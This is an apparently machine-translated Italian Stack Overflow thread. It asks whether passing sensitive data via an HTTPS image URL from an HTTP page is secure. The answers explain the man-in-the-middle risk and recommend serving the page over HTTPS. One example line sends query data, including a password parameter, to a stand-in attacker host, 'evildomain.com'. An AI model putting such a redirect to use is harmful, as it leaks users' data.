http, https e ajax bypass, forse?
https://stackoverflow.com/questions/1541329
-
20-09-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianDomanda
Ho uno script server che ho bisogno di passare i dati al dal browser senza ricaricare la pagina (aka Ajax). I dati sono sensibili così deve essere inviato tramite https. La pagina è comunque sullo strato http. A causa della stessa restrizione del dominio / protocollo, il browser non permette questo.
Sto pensando di barare il sistema un po 'con la creazione di dinamicamente tag di immagine e chiamare lo script usando il tag src come ad esempio:
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
Mi piacerebbe sapere se questo sarà effettivamente essere adeguatamente crittografati.
Soluzione
Il problema è se la pagina stessa è solo HTTP, allora sei suscettibile di un attacco man in the middle. Un utente malintenzionato può semplicemente modificare lo script nella pagina inviata su HTTP in modo che utilizzi invece:
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
L'utente sarà nessuno-la-saggio. Per ovviare a questo si ha realmente bisogno per servire la pagina tramite HTTPS troppo -. Che risolve perfettamente il vostro altro problema, allo stesso tempo
(Questa è esattamente la stessa ragione per cui le forme d'accesso dovrebbe essere su pagine HTTPS, piuttosto che solo il form action essere HTTPS).
Altri suggerimenti
Sì e no.
La parte di indirizzo del server del l'URL non è ovviamente crittografato dal momento che viene utilizzato per impostare la connessione.
Tutto il resto è crittografato durante l'invio tramite HTTPS. Ma chiunque visualizzi la sorgente sarà ovviamente in grado di vedere i dati da inviare.
Si porta anche ricordare che alcuni browser non verranno visualizzati (o potranno avvertire l'utente prima di visualizzare) pagine HTML in modalità mista (http vs https). In alcuni casi, questo potrebbe non funzionare perché l'utente seleziona per bloccarlo.
Una possibile alternativa alla tecnica dell'immagine (l'inconveniente di cui, come detto da altri, è quello di modalità mista non è trattata gentilmente da alcuni browser) sarebbe da ASSL .
In ogni metodo si tradurrà in crittografia accadendo, ed entrambi sono ancora vulnerabili agli uomini negli attacchi verso il centro.
